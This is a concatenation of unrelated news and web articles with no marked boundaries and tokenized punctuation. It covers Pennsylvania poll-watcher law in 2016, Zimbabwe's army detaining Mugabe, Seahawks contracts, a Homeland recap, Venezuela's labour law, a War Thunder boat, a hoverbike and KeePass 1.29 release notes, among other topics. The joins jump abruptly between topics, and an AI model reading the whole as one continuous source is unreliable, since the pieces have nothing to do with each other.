“ You 've got to go out , and you 've got to get your friends , and you 've got to get everybody you know , and you got ta watch the polling booths , ” Trump said at a rally in Manheim , Pennsylvania , last weekend . “ I hear too many bad stories , and we ca n't lose an election because of — you know what I 'm talking about .
Advertisement :
Added Trump : “ So go over and watch . And watch carefully because we 're going to win the state of Pennsylvania . ”
These rants often focus specifically on Pennsylvania , which Trump seems to believe he can snatch away from Democrat presidential nominee Hillary Clinton this cycle . The “ certain areas ” he 's referring to are the state 's Democratic strongholds — urban centers like Philadelphia and Pittsburgh — where minority voters have given Democratic candidates an as-yet insurmountable edge in presidential elections , and where conservatives falsely claim rampant voter fraud is occurring .
It 's entirely possible that Trump supporters will be on the hunt for “ voter fraud ” in Pennsylvania on Election Day . That 's worrisome , as it raises the specter of voting-line confrontations and intimidation of voters .
The important thing to recognize is that people ca n't just deputize themselves a poll watcher . Under Pennsylvania state law , official poll watchers must be affiliated with a political campaign or party , and there are limits on how many watchers can be at a polling place at any given time . Poll watchers must be residents of the county that their assigned polling site is in . They typically undergo training and must be certified and credentialed in order to enter a polling place and perform their official duties .
“ This idea of people coming and watching out of their own motivation is not something that would be legal , ” said Adam Gitlin , counsel at the Brennan Center for Justice 's Democracy Program .
What Trump is talking about presumably is having his supporters go to polling places and loiter outside , keeping their eyes peeled for pernicious voter fraud . It 's not clear how that 's supposed to work , given that such self-appointed poll watchers would have no access to voter registries . Nor would they be empowered in any way to do anything about fraud , imaginary or otherwise . If they do show up , they 're just going to be conspicuously hanging out in heavily Democratic areas where they think voter fraud will occur . ( State law requires that anyone who is n't in line to vote remain 10 feet away from a polling place . )
Advertisement :
That in and of itself is not voter intimidation . But if you have a group of people who are fed a story about election rigging , inflamed by the passions of the campaign and not familiar with election laws , you 're creating the conditions for intimidation to arise .
“ There may be some folks who decide to follow the narrative of election rigging and to go outside their home precincts to intimidate voters , ” Gitlin said . “ That would be really unfortunate , because a lot of the time even the most well-meaning efforts to monitor elections . . . easily slip into illegal conduct . ”
Things could get pretty hairy if Trump supporters show up at polling places with visible firearms . “ If it 's just people with Trump signs who are out there . . . just saying , ‘ Vote for Trump ' and maybe handing out literature , they have a First Amendment right to do that , ” said Sara Rose , staff attorney for the American Civil Liberties Union of Pennsylvania .
“ If people are just standing outside the polling place clearly having weapons , we think that 's intimidating and we 're going to take action , ” Rose added .
Advertisement :
The good news is that the ACLU and other election-integrity groups will have their own observers keeping tabs on polling places and looking for instances of voter intimidation . And Pennsylvania has a force of elected constables to make sure that no one is harassing , intimidating or hindering voters in any way .
Voters are also legally empowered to act if faced down by a gaggle of amateur Trump poll watchers who get out of hand . Pennsylvania state law states that “ any three qualified electors of any election district ” — meaning registered voters — “ may call upon any mayor , chief burgess , sheriff , deputy sheriff , constable , deputy constable , or police officer . . . to maintain order and quell any disturbance , if such arises . ”
So heads up , Pennsylvania voters : If a self-deputized Trump voter-integrity posse gets up in your face while you 're waiting to cast your ballot , these folks are breaking the law . If no help is immediately available , just grab the two the nearest registered voters and let the authorities know what 's happening .
Zimbabwe 's Army Seizes Control , Detains Mugabe And His Wife
Enlarge this image toggle caption Anadolu Agency/Getty Images Anadolu Agency/Getty Images
Updated at 6:05 a.m . ET Wednesday
Zimbabwe 's army said Wednesday that it has seized control in what is being described as `` a bloodless transition '' that has apparently pushed aside President Robert Mugabe . The military said he and his family are `` safe and sound . ''
Enlarge this image toggle caption Tsvangirayi Mukwazhi/AP Tsvangirayi Mukwazhi/AP
Armored vehicles and soldiers patrolled streets in the capital , Harare , amid loud explosions overnight . Soldiers reportedly took control of the headquarters of the national broadcaster , ZBC , and an army spokesman said on air : `` This is not a military takeover . ''
`` We are only targeting criminals around [ Mugabe ] , who are committing crimes that are causing social and economic suffering in the country , in order to bring them to justice , '' according to the statement .
However , just a week after Mugabe , 93 , fired longtime vice president and liberation war veteran Emmerson Mnangagwa , accusing him of disloyalty and disrespect , an account purporting to belong to the ruling ZANU-PF party tweeted that Mnangagwa had been installed as the party 's interim president .
The apparent putsch , which the military is refusing to call a coup , marks the first time in Mugabe 's 37-year rule that a public rift was visible between the military and the world 's oldest head of state , who has been in office since the end of white minority rule in 1980 .
Initially , the governing party accused Army Chief Gen. Constantino Chiwenga of `` treasonous conduct , '' but the party 's account later tweeted : `` There was no coup , '' but instead `` a bloodless transition which saw corrupt and crooked persons being arrested . '' Apparently referring to Mugabe , the tweet said that `` an elderly man who had been taken advantage of by his wife [ was ] detained . ''
The ZANU-PF Twitter account retweeted a message from the party 's youth league that said , `` The army is simply effecting a National Democratic Project and it 's doing so with peaceful aplomb . ''
In the army 's overnight broadcast , spokesman Gen. Sibusiso Moyo said the military expected `` normalcy '' to return as soon as the army had completed its `` mission . ''
Chiwenga had made an unprecedented announcement Monday that the army was prepared to intervene to halt party infighting and the purging of veterans , such as Mnangagwa , who fought Zimbabwe 's independence war .
Mnangagwa had been tipped as a likely successor to Mugabe , but fell foul of the president 's powerful wife , Grace Mugabe . His removal was widely perceived as a prelude to Mugabe promoting the politically ambitious but controversial first lady to one of two vice presidential posts .
In a statement attributed to Mnangagwa at the time he reportedly left for self-imposed exile , he promised to return to Zimbabwe to `` lead '' the country , warning Mugabe that the ZANU-PF party was not his personal property .
The U.S. Embassy closed to the public and encouraged citizens to shelter in place , citing `` the ongoing political uncertainty through the night . '' The British Embassy issued a similar warning and noted `` reports of unusual military activity . ''
When Byron Maxwell finally made the Packers pay by picking off a pass from Aaron Rodgers in the opener Thursday , the immediate thought was : If teams keep throwing at him like that , he will end up in the Pro Bowl alongside Richard Sherman , Earl Thomas and Kam Chancellor .
Teammate Michael Bennett added another thought , quipping to reporters , “ All they 're doing is driving Maxwell 's price up . ”
And now we have an idea of the price after Pittsburgh gave cornerback Cortez Allen a five-year deal worth $ 26 million this weekend .
Like Maxwell , Allen was drafted in 2011 ( Allen in the fourth round , Maxwell in the sixth ) and was due to become a free agent after this season . In eight starts last season , Allen intercepted two passes and had 13 passes defensed . Maxwell started the final five games and had four interceptions in the final four games .
So , the baseline for Maxwell obviously is $ 5 million a year , and the question is whether the Hawks want to give another big contract to a Legion of Boomer after paying Chancellor , Thomas and Sherman over the past two years .
Maxwell is one of four key defenders in the last year of their contracts , along with defensive end Cliff Avril and linebackers K.J . Wright and Malcolm Smith . The Hawks also might consider trying to keep left guard James Carpenter if he finally plays well for a full season . And towering over all of them is quarterback Russell Wilson , who will be eligible for a contract extension .
If the Hawks make no extensions during the season , they figure to have at least $ 29 million in room under a projected $ 140 million salary cap . If they roll over any of their unused 2014 cap space — currently at $ 7.3 million , but likely to shrink a bit due to injury replacements during the season — they could end up with something around $ 35 million .
That 's with only 40 players signed for 2015 , so deduct a base $ 7.5 million for 13 cheap players to fill out the roster , plus $ 1 million or so for rookie signing bonuses and $ 1 million for the practice squad . That would leave maybe $ 25 million to extend Wilson and decide among Avril , Maxwell , Wright , Smith and Carpenter — plus , a tender for restricted free-agent receiver Jermaine Kearse and the usual injury slush fund .
Figure the Hawks can get away with Wilson counting $ 10 million in 2015 ( before his cap hit likely jumps to $ 20 million in succeeding years ) . That would leave maybe $ 10 million for other free agents , which means the Hawks might be able to keep two among Avril , Maxwell , Wright , Smith and Carpenter — unless , of course , they remove other salaries ( e.g. , Tony McDaniel at $ 2.5 million ) or restructure Percy Harvin 's deal to free up more money ( they could add $ 6 million or so if they were willing to add to his future cap hits ) .
Avril , 28 , surely is hoping to hit $ 10 million a year in one last big NFL contract . Wright and Smith probably will hope to get $ 5 million per year . And if Maxwell keeps picking off passes , his price might go beyond $ 5 million .
The Hawks are unlikely to pay that much for Avril , Wright or Smith , but will they be willing to pay another Legion of Boomer ?
Advertisements
After a slow start to the season – focused on the emotional fallout of Carrie 's misadventures in Berlin -- Homeland Season 6 Episode 3 picks up the pace on the espionage and action . Carrie , Saul , and even Quinn get their spy-groove back , while Dar continues to position himself with the president-elect .
Quinn 's back ! ( Maybe )
Howdy Quinn lovers ( AKA everyone ) ! How psyched were you to watch Quinn beat the crap out of that douche Tommy and wrap his sexy assassin hand around a gun once again ? We are truly blessed !
After trying to get frisky with Carrie and getting his stinky ass rejected ( maybe if you 'd showered like she asked , you could 've gotten lucky , dude ... just sayin ' ) , Quinn went on a rampage , taking out his sexual frustration on Tommy 's face and stealing the scumbag 's gun .
* Quinn hits Tommy across the head *
Tommy : Fuck , man !
Quinn : So , that 's the two thousand I owe you , less the two thousand you stole from me leaves what ? How much I owe you now ?
Tommy : Zero . Nothing .
Quinn : You 're fucking right . Permalink : How much I owe you now ?
Permalink : How much I owe you now ?
Why did Quinn need a gun ? Because he sensed somebody was watching Carrie and decided to investigate .
Like Carrie , his alter ego , Quinn 's default is recklessness . I 'm not sure assuming the role of vigilante is such a great idea in his current condition , but at least it gives him something to do other than be sullen .
Is someone really after Carrie or is Quinn being paranoid ? He 's been imbibing conspiracy theories via radio and his senses are off , so it 's not quite clear .
It 's a clever role reversal , though , with Carrie the `` unreliable narrator '' of Homeland Season 1 . Nobody believed her about Brody because she was such a freaking basket case . Now , we get to play the `` is he onto something or is he imagining things ? '' game with Quinn .
Knowing how Carrie 's suspicions panned out , it 's probably wise to give Quinn the benefit of the doubt on this one . In the meantime , we 'll just enjoy him in badass mode , even if he 's still a little wobbly .
Carrie gets her way
Considering Carrie 's historic reluctance to operate within the confines of the law , the idea of her working for a law firm is pretty darn hilarious . In fact , her little tête-à-tête with Saad , against the judge 's orders , led the prosecution to withdraw the plea deal it had offered Sekou . Oops .
Reda : This is n't the arrangement we made , Carrie .
Carrie : What do you mean ?
Reda : Our partnership . You were supposed to secure funding , investigate , advise . What you were n't supposed to do is take matters into your own hands , break the law .
Carrie : I 'm sorry , Reda . I fucked up .
Reda : Yeah , you did . Permalink : This is n't the arrangement we made , Carrie .
Permalink : This is n't the arrangement we made , Carrie .
Carrie , after admitting to Reda that she frakked up , proceeded to dig herself in even deeper by getting some dirt on Conlin and blackmailing him .
The crooked little smile on her face as she triumphantly left Conlin 's office was the same devious smile she had when she eluded her pursuers in a bazaar on Homeland Season 2 Episode 1 .
If you 'll recall , after being booted from the CIA and spending a few months putzing around her sister 's vegetable garden , she got her fix during a one-off mission to Beirut for her former employer .
Because , like Quinn , Carrie is an action addict . When Quinn told her in Homeland Season 4 Episode 4 , `` It 's like a drug , you know , going from one mission to the next , '' Carrie knew exactly what he meant .
It was this addiction that Carrie tried to quit cold turkey by running away and establishing a fake life in Berlin .
She failed , obviously , and now she appears to be giving free rein to her impulsive instincts . But at what cost ?
She scored a point against Conlin and is riding high on the adrenaline of the chase . But given that we 're only three episodes in , chances are good that Carrie 's self-congratulatory bubble will burst pretty soon and pretty dramatically .
Will she eventually learn to use her gifts and honor her calling while managing the more destructive facets of her addiction ? I 'm not sure , but it will be fun to watch her mess up majorly as she tries to reconcile the feuding aspects of her personality .
Saul , back in the groove
Saul is another spy whose instincts have gone a bit dull over the past few years . In Homeland Season 4 , he walked right into a trap set by Pakistani intelligence at the Islamabad airport and got himself abducted by mega-baddie Haissam Haqqani .
Then , in Homeland Season 5 , he got honey trapped by Russian double agent Allison Carr and it took him most of the season to figure out he 'd been duped .
Well , now Saul is back in the field , traveling to Abu Dhabi to get intel on the alleged parallel Iranian nuclear program from a source brought in by Mossad .
Saul : Says here you have a 120 million dollar line of credit at First Emirates , a little over half of which was accessed in the last week .
Nafisi : So ?
Saul : Compliant bank , correspondent accounts , these are the same tactics you used to counter U.N. sanctions , fund Hezbollah , export your revolution to the rest of the world .
Nafisi : Is that a compliment ? Permalink : These are the same tactics you used to counter U.N. sanctions
Permalink : These are the same tactics you used to counter U.N. sanctions
The interrogation scene has the nostalgic feel of old-time Homeland . Saul 's still got it ; he sees right past his target 's lies and confirms , with great confidence , that the Iranians are indeed cheating on the nuclear deal .
Or are they ? Just like it 's hard to trust that Carrie has triumphed over Conlin merely three episodes into the season , it 's likely there 's more than meets the eye where the Iranian scheme is concerned .
Nothing gets past Dar
That mysterious cigarette box Saul found in the waste bin is gon na spin this thing out into a whole new direction , but just what that direction might be is anyone 's guess . Whatever it is , I ca n't help but think Dar Adal has got his shady prints all over it .
Scratch that ; Dar 's way too smart to leave his prints on anything . As the ultimate puppet master – scheming , undecipherable , ruthless – he is the CIA incarnate . Dar Adal 's motivation is singular : keep America safe by any means necessary .
Yes , he 's capable of human emotion . His eyes welled up when he discovered the fate of `` his guy '' Peter Quinn at the hands of the terrorist cell in Berlin .
But Dar does not let feelings – or morality , for that matter – get in the way of what needs to be done . He is the ultimate pragmatist and he can not be manipulated .
We fear him and distrust his methods , yet ultimately , we ca n't be sure that he 's wrong , so we admire him grudgingly and suspiciously and try to keep him on our side . And so does President-elect Elizabeth Keane :
Keane : What would you do ? Call the Iranians out ?
Dar : I would , yes .
Keane : Well you can guess how I feel about your advice .
Dar : I 'm an old spy , madam . I trust old friends , new ones , not so much .
Keane : Well I 'm going to try not to take that personally .
Dar : That 's not what I meant .
Keane : I hope not .
Dar : Otherwise you should feel free to ask the director for someone you 're more comfortable with .
Keane : You know what , I do n't think so . I think I 'll stick with you .
Dar : As you wish . Permalink : I 'm an old spy , madam .
Permalink : I 'm an old spy , madam .
Dar , in essence , is a lot like Carrie ; both are willing to do whatever it takes to achieve their goals . But where Carrie is impulsive , reckless , and ruled by emotion , Dar is immutable and calculating .
The two are deeply suspicious of each other and have been itching to bring each other down since Homeland Season 4 . Back then , Dar outsmarted Carrie big time – he struck a deal with Haqqani and kept her from reaching Quinn when he shipped off to Syria .
This season is preparing to pit Dar and Carrie against each other in an epic showdown that 's been a long time coming . But it 's personal for Carrie . It always is . Will our heroine be able to keep her emotions in check to finally outfox the old fox ? I 'm going to go with `` no . ''
Are you excited to see Dar and Carrie go head-to-head ? Be sure to watch Homeland online and leave your comments below .
The Covenant Review Editor Rating : 4.3 / 5.0 4.3 / 5.0
1
2
3
4
5 User Rating : 3.4 / 5.0
1
2
3
4
5
Rating : 3.4 / 5.0 ( 62 Votes ) 4.3 / 5.0
Vivian Figueredo is a staff writer for TV Fanatic . Follow her on Twitter and read her personal blog at Sense Misapplied .
Daniel Ricciardo will drive on Tuesday with Spanish Grand Prix race-winner Max Verstappen taking over the day after for the two-day test .
Renault 's upgraded engine is predicted to deliver a power boost that could be worth up to four tenths of a second per lap , which would put the team even more in the mix with Mercedes and Ferrari .
Red Bull boss Christian Horner praised the work that Renault had been doing , as he talked with confidence about what potential there was still to come .
`` With what 's in the pipeline for the coming races , there 's a lot of reason for optimism , '' he said .
`` I think if we get what 's advertised then it 's going to put us in a position to at least race Ferraris every weekend , and then hopefully we can get into trying to close that gap down to Mercedes at certain circuits .
`` Daniel [ Ricciardo ] qualified within 0.65 seconds of Lewis Hamilton here , which is the closest I think anybody has really been in the last 12 months .
`` At a track like this , that is really encouraging . So I think if we can find a few tenths on the power unit side it 's only going to be gratefully received . ''
Red Bull 's decision to use Ricciardo and Verstappen means it is one of two teams to run just race drivers , the other being Haas .
Every other outfit has split duties between its regulars and a youngster .
Barcelona test line-up
If you 're looking for video game sound effects then this page has you covered . We 've drawn up a huge list of free sounds . Whether it 's 8-bit sound effects , chip tunes , or laser sounds , we have it all !
Video games have played a huge role in our lives over the years . People of many generations have grown up playing video games , whether on a Sega Master System , Commodore 64 , Super Famicom or Playstation . Just like hit music , video game sounds stick with us and remind us of our favourite games .
That 's why it is common for musicians to use these types of sounds in their music . You have likely heard a video game sound in electronic music at one point . The use of chip tunes or 8-bit sound effects can take a song to a whole new level , especially when a producer glitches the original sound to create entirely new soundscapes .
The web is full of video game recordings that will inspire your own music . In the following list , we have put together a complete list of sound effects and tunes . They 're sorted by type so it will be easy to find what you 're searching for .
Free Video Game Sound Effects Sample Packs
First of all , let 's take a look at sample packs for video game sound effects . These packs contain multiple video game sound effects , including sound effects and music . You can use them to inspire your own gaming tracks .
Games and 8-Bit Kit Volume 1
Free 8 Bit Samples Packs
8 Bit Beats
Casual Game Sound FX Pack
NES Style Sound Effects Pack
8 Bit Sound Effect Sample Pack
Arcade 8-Bit Sound Effects Pack
8 Bits Free Sound Collection
Super Mario Sound Effects Sample Pack
Mario Cart Sound Effects Sample Pack
Smash Bros Sound Effect Samples
GoldenEye Sound Sample Pack
Zelda Sample Pack
Banjo Kazooie Sound Effects Pack
30 Game Sound Effects Sample Pack
Free Laser Sound Effects
Nothing is more memorable than laser sound effects in video games . These free samples can add a retro gaming feel to your music . Download these samples below and use them in your own tracks :
Space Invaders Style Laser 1
Long Laser Shot
Classic Style Laser
Sci-Fi Laser
8-Bit Laser
Laser Beam
Alien Laser
Free Blip Sound Effects
Nearly all retro video games have unique blip sound effects . Many artists add them to songs either in repetition or at various arcs .
1st Retro Blip
2nd Retro Blip
3rd Retro Blip
High Pitch Blip
Quick Blip
Double Blip
Free Sweep Sound Effects
Sweep sound effects are found in video games like Mario , Zelda , and other classics . Adding them to your music can add extra rhythm and bring back fun memories of those games .
10 Free Sweep Effects
Generic Kick Sweep Effect
Roundhouse Kick Sweep Effect
Digital Sweep
Swooshing Sweep Effect
Sci-Fi Sweep Effect
Dimensional Sweep
Wavy Sweep
Electronic Sweep
Transition Sweep
Impact Sweep
Video Game Chip Tune Samples
The 8-bit music from classic video games is as memorable as it is fun to listen to . You can use these chip tune samples in remixes and electronic music to make killer tracks .
Free 8 Bit Chiptune Collection
8 Bit Adventure Chiptune
Pixel Land Chiptune
8 Bit Root Chip Tune
Hero 's Day Off Chiptune
8 Bit Village Chiptune
8 Bit Intro Chiptune
Random Zero Chiptune
Dungeon Boss Chiptune
Pinball Spring Chiptune
8 Bit Paradise Chiptune
8 Bit Theme Chiptune
Venezuela 's new Labour Law for Workers came into effect on May 7 , guaranteeing shorter working hours , longer maternity leave and pensions for all Venezuelans .
Described by the Venezuelan government as the “ most advanced labour law in the world ” , the law reduces the working week from 44 hours to 40 , and requires that employers provide two consecutive days a week off .
When the law came into effect , labour minister Maria Iglesias said the new working hours are part of the process towards a “ just distribution of wealth ” .
The next day , Carabobo state labour affairs committee president Jose Joaquin Vargas hailed the law as an important part of the transition from “ capitalism to socialism ” . Vice president of the National Federation of Public Sector Workers Franklin Rondon told VTV on May 5 that the law was “ historic ” .
“ We are in a historic moment , in 14 years the achievements we have obtained for workers are numerous ; we have achieved much more than in the past 40 years , ” Rondon said .
Vargas urged workers to ensure their employers and unions act in accordance with the law .
In the next six weeks , the government will inspect workplaces to ensure employers adhere to the new requirements . Employers were told earlier in the year that they would need to make any necessary changes before May 7 . However , Iglesias said that day that inspections over the next six weeks will be “ corrective in nature ” .
The minister warned that penalties will be imposed on employers who fail to adhere to the law after June 15 .
However , workers are already reporting breaches of the new laws . In Miranda state , employees of processed meat manufacturer Industrias Alimenticias de Corralito ( Inacor ) have denounced their boss . A spokesperson for the workers , Peggy Serrano , said management made a series of surprise changes to the timetable that could result in employees being forced to work overtime .
Along with establishing new working hours , the law prohibits unfair dismissal , outsourcing , guarantees the right to work for both women and people with disabilities and increases maternity leave .
Under the law , Venezuela now has the world 's third-longest maternity leave scheme . Mothers are entitled to six weeks pre-natal leave , and 20 post-natal . Fathers are also entitled to two weeks paternal leave .
Under the law , the same conditions apply to parents who adopt a child under three years old .
All workers are also now entitled to retirement pensions , including full-time mothers and the self-employed .
The law is the result of nearly a decade of discussions in the national assembly and the labour movement .
Late former president Hugo Chavez , when he approved the law in April last year , said : “ In more than 200 years of republican history I am absolutely positive that there has never been a work law … that has been debated so much as this one . ”
[ Reprinted from Venezuela Analysis . ]
Jasper Rose did n't want presents for his sixth birthday . He wanted money . So he could save endangered sea turtles .
`` He let everyone know he did n't want any presents , '' his mom , Ananda , told InsideEdition.com . `` So all of his friends from school , instead of giving him some crappy $ 15 toy , they gave him the money instead . ''
Read : Man Smuggles 51 Turtles Inside His Sweatpants , Gets Sentenced to 5 Years in Prison
Between family and friends , Rose raised $ 550 , which he donated Friday to the New England Aquarium to help rescue sea turtles . He also got to feed Myrtle , the 90-year-old turtle , some lettuce and green goodies .
`` Jasper is over the moon , '' his mom said . `` It was really fantastic . He had a great day . '' He even made a little speech as handed over an envelope of cash , and was interviewed by local print and TV reporters .
Ananda is n't sure why her young son is so taken with protecting the environment and saving sea turtles .
Read : Coast Guard Rescue Sea Turtles Tangled in Debris
`` He 's just really into it . I ca n't tell you why . For his birthday , he really wanted to help the sea turtles . '' He came up with the idea of asking for donations instead of presents on his birthday , which was April 2 .
Jasper has been going to the aquarium with his parents since he was three . He asked his mother to read him books about sea life .
When he grows up , he wants to be a marine biologist .
`` He 's a very smart boy , '' his mother said .
Watch : Man Jumps Into Ocean to Save 700-Pound Turtle Being Choked By Kelp
New York Mayor Bill de Blasio plans to host a meeting of leading progressive elected officials and activists at Gracie Mansion on Thursday with the explicit goal of forcing the issue of income inequality to the forefront of the national political debate and the 2016 elections .
In a telephone interview Wednesday , de Blasio said his frustrations with the messaging by Democratic candidates during the 2014 midterms and the overall failure among elected officials to tackle income inequality head-on led him to conclude that progressives must be more aggressive in elevating the issue .
“ As a Democrat , I am very disappointed that my party has not spoken with a clearer voice on this issue , ” de Blasio said .
The mayor said that influencing the dialogue in the 2016 presidential race is not the sole purpose of the effort he hopes to organize .
He would not directly address whether he thinks former secretary of state Hillary Rodham Clinton should outline bold proposals to reduce income inequality .
The mayor was Clinton 's Senate campaign manager in 2000 , and she attended his inauguration in 2013 , along with her husband , former president Bill Clinton . De Blasio was elected mayor running on an unabashedly liberal platform , while both Clintons have been identified more with centrist Democratic ideas . Hillary Clinton is expected to launch her presidential campaign this month .
“ On presidential candidates in general , my take is , I do n't talk about anyone until they are a declared candidate , ” de Blasio said . “ But I think many of us feel profound dissatisfaction at the state of the debate in general . I can not identify any declared candidate who is presenting a holistic vision here . In 2014 , many [ Democrats ] went out of their way to avoid the issue . ”
He praised President Obama for highlighting income inequality in this year 's State of the Union address and noted that some Republicans and some business leaders have at least begun to make reference to the issue . But he said that beyond Obama 's January speech , nothing since then “ suggests a course correction ” on the part of elected officials or prospective candidates .
Asked to assess why Democrats in particular have not been more aggressive on the issue , he said , “ A lack of leadership and a lack of imagination underlying all of it . ”
He cited two other obstacles : timidity on the part of political strategists and party consultants to confront the issue more robustly ; and the influence of money in politics . “ Platform , vision and message have been replaced by decisions about resources , ” he said . “ That 's not a winning hand . ”
De Blasio said Thursday 's gathering will include about 12 to 15 people from around the country . He said a list of names will be made available after the meeting . Among those expected to attend are Sen. Sherrod Brown ( D-Ohio ) and Nobel Prize-winning author Toni Morrison .
One person who will not be there is Sen. Elizabeth Warren ( D-Mass . ) , a leading advocate for a more robust set of politics to reduce the power of big banks and financial institutions , and address the needs of middle-class families . De Blasio said a scheduling conflict will prevent Warren from attending .
[ Earlier : Elizabeth Warren keeps pressure on fellow Democrats ahead of 2016 ]
The meeting marks the beginning of what the mayor hopes will become a larger and sustained effort . He will take his message about addressing income inequality to Iowa later this month , a trip first reported by Capital New York . The mayor also will speak at a Democratic Party dinner in Wisconsin at the end of April .
De Blasio was invited to speak at Drake University in Des Moines by former Iowa senator Tom Harkin . Harkin was one of nearly 200 Democrats in Iowa and New Hampshire who recently signed a petition calling on Clinton and other Democratic presidential candidates to campaign in 2016 on big , bold populist ideas of the kind often associated with Warren .
De Blasio said one major goal of Thursday 's meeting and subsequent organizing efforts will be to advance specific policies that he and other progressives believe have not received enough attention or support from elected officials .
He highlighted the goal of a more progressive tax code as central in that agenda . “ You can not address this [ income inequality ] without addressing progressive taxation that clearly will ask more of the wealthy , ” he said .
The mayor said he is as concerned about jump-starting the discussion with current elected officials as he is about affecting the coming presidential debate . And he underscored the challenge of trying to create genuine political momentum behind policies that many elected officials have long resisted or opposed .
“ I think this is going to take a lot of repetition and a lot of organizing , ” he said , adding , “ We do n't address this issue at our national peril . . . . Progressives have an obligation not to accept the status quo . . . . We 're going to try to raise the bar here . ”
Attention ! This news was published on the old version of the website . There may be some problems with news display in specific browser versions .
Project 122bis sub-chaser
We are pleased to present another heavy hitting boat that will appear in the War Thunder naval warfare closed beta test very soon : the Project 122bis !
The large Project 122bis submarine chaser was developed in the Soviet Union on the eve of the Great Patriotic War . Unfortunately , the war prevented large-scale production , but immediately after the war ended , military command decided to increase the production of Project 122 boats , at the same time performing important modernization efforts .
The factories of the USSR turned out to be capable of producing Project 122a and Project 122bis at an impressive pace – enough to even export them to countries friendly to the Soviet Union .
Download Wallpaper : 1280x1024 | 1920x1080 | 2560x1440
In War Thunder , we present to you the Project 122bis of the post-war production series . The boat has decent artillery armament : its main caliber is the universal 85 mm K-90 with armor-piercing and high-explosive shells – successfully backed up by a pair of 37 mm automatic cannons and several high-caliber machine guns .
The main features of the Project 122bis in War Thunder are depth charges and a special jet-powered bomb thrower for them . This is the first boat in the game with armament like this – the bombs can not only be dropped behind the boat , but also launched ahead and even to the sides ! The bombs do n't fly very far , but their steep trajectory allows them to be thrown very accurately . The delay on the explosion of the depth charges will also add significant variety to gameplay – a small area in front of a moving enemy can be quickly mined to send the opponent to the bottom ! It 's worth a go !
Keep an eye on our devblog and be the first to find out the recent news about new additions to the game !
Previous Development Blogs :
Inventor Chris Malloy sits on his tethered ‘ hoverbike ' , which he built in his garage and hopes to sell for £30,000 to farmers in remote areas of Australia ( Picture : Caters )
Chris Malloy claims his flying machine , which is ridden like a bike but has horizontal propellers instead of wheels , will reach altitudes of up to 3,000m ( 10,000ft ) and speeds of more than 270kph ( 170mph ) .
But the 32-year-old 's creation has so far remained tethered just a few metres off the ground .
‘ I am still ground testing at the moment , only because I 'm not 100 per cent sure what will happen so the straps are there to cover the unknown , ' he said .
‘ I have n't had the pleasure of flying round the countryside yet . It is quite stable and does n't want to tip over but , if something unplanned happened during testing , I would n't want to break the prototype . '
The hoverbike bears a striking resemblance to The Speeder Bike seen in the Star Wars films ( Pic : LucasFilm
The Australian inventor has spent his life savings and two and a half years constructing the space-age bike in his Sydney garage using a custom built frame and a BMW engine .
Advertisement
Advertisement
The futuristic design , which is complete with parachutes in case of an emergency , bears a passing resemblance to the Speeder Bikes seen roaring across alien planets in the Star Wars films or The Jetsons 's 2062 hovercar .
Mr Malloy hopes outback farmers will be willing to pay £30,000 for his creation to help them control cattle on sprawling ranches .
Previous experience of flying a helicopter or plane would help before piloting his bike , which could fly for about 45 minutes on one tank of fuel .
‘ This is a new way to fly and one would need to learn to ride the hoverbike in much the same manner as a helicopter or riding a motorcycle , ' he added .
Watch the hoverbike be subjected to a smoke test in the video below :
Juventus 15-16 Training Shirt
The new Adidas Juventus 2015-2016 Training Jerseys draw inspiration from the pink Juventus 15-16 Away Kit , launched in July 2015 . It 's the first time that Adidas will make the new Juventus Football Kits and Training Shirts after replacing previous shirt supplier Nike . In October 2013 , Adidas announced that they will be taking one of Nike 's biggest club kit deals . The six-year Adidas Juventus kit deal begins in July 2015 and is worth more than €23m / season . Adidas will produce the Juventus FC kits until at least 2020-2021.This is the new pink Adidas Juventus 2015-2016 Training Kit.The first Adidas Juventus 2015-2016 Training Shirt is mainly white with traditional black 3 stripes running down the sleeves of the shirt . Based on the Adidas Tiro 15 training shirt , the new Juventus FC 15-16 Training Shirt has a crew neck collar , while it boasts a striking pink / black stripe at the bottom of the shirt.The accent color pink of the white Adidas Juventus Training Shirt infiltrates the pink Juventus 2015-16 Training Top . It resembles the colors of the new Juventus 15-16 Away Kit , which will be pink.The white Juventus 15-16 Training Shirts boasts accents in black and pink , based on the same Adidas training shirt template as the pink variant.See all leaked and released Premier League , La Liga , Bundesliga and Serie A 15-16 Kits in our kit overview . What do you expect from the first Adidas Juventus 2015-16 Kits ?
Imagine yourself leaving your home everyday and walking miles , just to get water . Now imagine arriving at your destination , to find that the only source of water is a dirty swamp filled with muddy , contaminated water , which is what you must bring back to your friends and family . For millions of people living in the world right now , that is their reality . 50 % of hospital beds are filled with people who are sick because they drink dirty water . If you are like me , you ca n't even understand a world like this , because we have an endless supply of clean water right at our fingertips . We do n't even realize how lucky we are , because it seems so simple . But if you 've ever seen a video of people living in these conditions , they are the happiest people you 've ever seen . They dance and sing and are just so happy to be alive . When I found out about Charity : Water , an organization that raises money to build wells in communities suffering from the lack of clean water , I knew I wanted to do something to help . I am so blessed with the life that I have , while some people truly have nothing . So lieu of gifts for my sweet sixteen , I would appreciate it if you made a donation to Charity : Water . Just $ 20 can give someone clean water for 20 years ! Any donation helps ! Thank you !
Most people ask me why I do n't want presents for my birthday . But this is my present . Getting actual presents is nice , but truthfully , I wo n't remember what I got in a year or two . But funding a well ? That is something I will remember forever .
KeePass 1.29 available !
KeePass 1.29 has been released today !
You can get it here : Download KeePass 1.29 .
This is a stable release . It is recommended to upgrade from any previous 1.x version to 1.29 . KeePass 1.29 is 100 % backward compatible with previous versions .
KeePass 1.29 mainly features user interface and integration enhancements , and various other minor new features and improvements .
Hash sums and OpenPGP signatures for integrity checking are available . New translations are available , too .
For a comparison of the current KeePass 1.29 and 2.28 , see : Editions Comparison .
If you like KeePass , please do n't forget to donate .
Changes from 1.28 to 1.29 : New Features : The font used in password text boxes can now be changed ( 'Tools ' - > 'Options ' - > tab 'Interface ' - > button 'Select Password Font ' ) .
{ FIREFOX } placeholder : if no regular Firefox is installed , KeePass now looks for Firefox ESR .
placeholder : if no regular Firefox is installed , KeePass now looks for Firefox ESR . In the field reference dialog , the field in which the reference will be inserted is now selected as source field by default .
Increased notes size limit to about 2 GB .
The path of the local configuration file can now be changed using the ' KP1_CFG_LOCAL ' environment variable .
' environment variable . All KeePass program binaries are now digitally signed ( thanks to Certum/Unizeto ) . Improvements : Removed ' O ' and ' C ' access keys from 'OK ' and 'Cancel ' buttons ( instead , press Enter for 'OK ' and Esc for 'Cancel ' ) .
Upgraded to Boost libraries version 1.57.0 .
Various code optimizations .
Minor other improvements . Bugfixes : AltGr+E ( i.e . Ctrl+Alt+E ) does not focus the quick search box anymore .
